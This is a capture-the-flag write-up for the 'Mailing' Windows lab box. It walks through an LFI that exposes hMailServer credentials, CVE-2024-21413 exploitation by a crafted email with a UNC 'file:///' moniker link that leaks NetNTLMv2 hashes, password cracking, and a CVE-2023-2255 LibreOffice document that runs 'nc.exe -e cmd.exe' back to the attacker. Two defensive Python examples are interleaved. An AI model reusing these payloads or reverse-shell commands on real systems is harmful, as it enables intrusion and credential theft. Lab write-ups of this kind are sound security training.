Mailing

OS: Windows
Difficulty: Easy
Points: 20

Nmap Scan

ports=$(nmap -p- --min-rate=5000 -T4 10.129.13.29 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p $ports -sC -sV -oN nmap.txt 10.129.13.29
Nmap scan report for 10.129.13.29
Host is up (0.29s latency).

PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: completed CAPABILITY OK ACL RIGHTS=texkA0001 IMAP4 IDLE SORT NAMESPACE QUOTA CHILDREN IMAP4rev1
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
587/tcp   open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp   open  ssl/imap      hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_imap-capabilities: completed CAPABILITY OK ACL RIGHTS=texkA0001 IMAP4 IDLE SORT NAMESPACE QUOTA CHILDREN IMAP4rev1
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
64503/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

On the main page there is a button to download files.

This download function is vulnerable to Local File Inclusion (LFI).

Local File Inclusion (LFI)

We can retrieve the hMailServer configuration file through the LFI.

http://mailing.htb/download.php?file=../../Program+Files+(x86)/hmailserver/Bin/hmailserver.ini
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
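As an added example (not code from this writeup or from the box), here is the containment check the download endpoint is missing, next to the naive join that the request above abuses. The download root and the file names are assumed/constructed; the payload string is the one from the request above.

```python
import os
from typing import Optional
from urllib.parse import unquote_plus

# Constructed for this example: the directory the download endpoint is meant
# to serve from. On the real box it would live under the IIS web root.
DOWNLOAD_ROOT = os.path.abspath("/var/www/html/downloads")


def vulnerable_resolve(file_param: str, root: str = DOWNLOAD_ROOT) -> str:
    """Naive join with no containment check: the behaviour the LFI above abuses."""
    return os.path.normpath(os.path.join(root, unquote_plus(file_param)))


def hardened_resolve(file_param: str, root: str = DOWNLOAD_ROOT) -> Optional[str]:
    """Return a path inside root, or None when the request tries to escape it."""
    name = unquote_plus(file_param)
    if not name or "\x00" in name:
        return None
    # Treat Windows separators like '/', since the target serves from IIS.
    name = name.replace("\\", "/")
    # An absolute path or a drive letter makes os.path.join discard root.
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return None
    resolved = os.path.normpath(os.path.join(root, name))
    # commonpath rather than startswith: "/downloads2/x" would pass a prefix test.
    if os.path.commonpath([root, resolved]) != root:
        return None
    if resolved == root:
        return None  # the root directory itself is not a file to serve
    return resolved


# The exact value from the request above; the resolver URL-decodes it.
LFI_PAYLOAD = "../../Program+Files+(x86)/hmailserver/Bin/hmailserver.ini"

if __name__ == "__main__":
    print("vulnerable :", vulnerable_resolve(LFI_PAYLOAD))
    print("hardened   :", hardened_resolve(LFI_PAYLOAD))
    print("legit file :", hardened_resolve("instructions.pdf"))
```

Blocked requests are also worth logging: a download.php request whose file parameter contains ".." or a drive letter is a clean detection signature for this endpoint.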

Crack Hash

Using CrackStation we obtain the password.

homenetworkingadministrator

Microsoft Outlook RCE (CVE-2024-21413)

After investigating several things, we deduced that the box is probably vulnerable to CVE-2024-21413, since Outlook is mentioned a lot in the PDF served by the download function and we have a username/password to send mail. We used the Outlook exploit, which lets us leak information (the recipient's NetNTLMv2 hash), with the following script:

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.218\doom' --subject 'Test'

It is also possible to get it in the following way, which worked correctly for me.

swaks --auth LOGIN --server mailing.htb --port 587 --to maya@mailing.htb --from administrator@mailing.htb --auth-user administrator@mailing.htb --auth-password homenetworkingadministrator --body  '<html><body><a href="file:///\\\\10.10.14.218\\test\\test.rtf!something">CLICK ME</a></body></html>'
responder -I tun0 -v
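As an added example (not part of this writeup), a mail-gateway check that flags the kind of link sent above: a file: URL pointing at a remote host with the "!" moniker suffix. It goes a step beyond the exact link and also flags any file: link to a UNC share, while ignoring local file:///C:/ paths. The sample bodies are constructed; the first mirrors the swaks body above.

```python
import re
from html.parser import HTMLParser
from typing import List, Tuple


class _HrefCollector(HTMLParser):
    """Collect every href on an <a> tag in an HTML mail body."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


# file: URL whose first path component is a host (\\host\share or //host/share)
# rather than a local file. Group 1 captures the host.
_UNC_FILE = re.compile(r"^file:[/\\]{2,}([^/\\]+)[/\\]", re.IGNORECASE)


def classify_links(html_body: str) -> List[Tuple[str, str]]:
    """Return (href, reason) for every link a mail gateway should flag."""
    parser = _HrefCollector()
    parser.feed(html_body)
    findings: List[Tuple[str, str]] = []
    for href in parser.hrefs:
        match = _UNC_FILE.match(href)
        if not match:
            continue  # not a file: URL, or file: without a host part
        host = match.group(1)
        if re.fullmatch(r"[A-Za-z]:", host):
            continue  # file:///C:/... is a local path, not a remote share
        if "!" in href:
            # The '!' after the file name is the moniker syntax used above.
            findings.append((href, f"file moniker with '!' pointing at {host}"))
        else:
            findings.append((href, f"file: link to a remote share on {host}"))
    return findings


# Constructed samples: the first mirrors the body sent with swaks above.
MONIKER_BODY = r'<html><body><a href="file:///\\\\10.10.14.218\\test\\test.rtf!something">CLICK ME</a></body></html>'
SHARE_BODY = '<p>Report: <a href="file://fileserver/share/q1.rtf">open</a></p>'
BENIGN_BODY = '<a href="https://mailing.htb/">site</a> <a href="file:///C:/Users/maya/notes.txt">local</a>'
```

Blocking outbound SMB (445/tcp) at the perimeter is the complementary control: even if the link is clicked, the NetNTLMv2 exchange with the attacker's host never happens.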

We use John to crack the captured NetNTLMv2 hash.

┌──(root㉿kali)-[~/htb/Box/Mailing]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
m4y4ngs4ri       (maya)     
1g 0:00:00:06 DONE (2024-05-07 09:10) 0.1501g/s 890849p/s 890849c/s 890849C/s m61405..m4895621
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

With that password we can authenticate over WinRM.

evil-winrm -i mailing.htb -u 'maya' -p 'm4y4ngs4ri'

Privilege Escalation

In the root of C:\ there is a folder called Important Documents.

*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         4/10/2024   5:32 PM                Important Documents
d-----         2/28/2024   8:49 PM                inetpub
d-----         12/7/2019  10:14 AM                PerfLogs

Among the installed programs we also find LibreOffice, version 7.4.

*Evil-WinRM* PS C:\> type "Program Files\LibreOffice\readmes\readme_en-US.txt"


======================================================================

LibreOffice 7.4 ReadMe

======================================================================

LibreOffice (CVE-2023-2255)

This version of LibreOffice is vulnerable to the following exploit.

First we upload nc.exe to the machine to get a reverse shell.

mkdir c:\temp
upload /root/htb/Box/Mailing/nc.exe c:\temp\
*Evil-WinRM* PS C:\Important documents> dir c:\temp


    Directory: C:\temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/7/2024   3:31 PM          45272 nc.exe

Now we generate our .odt file.

┌──(root㉿kali)-[~/htb/Box/Mailing/CVE-2023-2255]
└─# python3 CVE-2023-2255.py --cmd "c:\temp\nc.exe -e cmd.exe 10.10.14.218 1234" --output 'doom.odt'
File doom.odt has been created !

Next we upload it to the machine, into the Important Documents directory.

*Evil-WinRM* PS C:\Important documents> upload /root/htb/Box/Mailing/CVE-2023-2255/doom.odt
                                        
Info: Uploading /root/htb/Box/Mailing/CVE-2023-2255/doom.odt to C:\Important documents\doom.odt
                                        
Data: 40704 bytes of 40704 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Important documents> dir


    Directory: C:\Important documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/7/2024   3:36 PM          30529 doom.odt

After a moment we get our reverse shell.

This user has full privileges, so we can perform any action on the box.

References

https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
https://github.com/elweth-sec/CVE-2023-2255
https://github.com/int0x33/nc.exe/blob/master/nc64.exe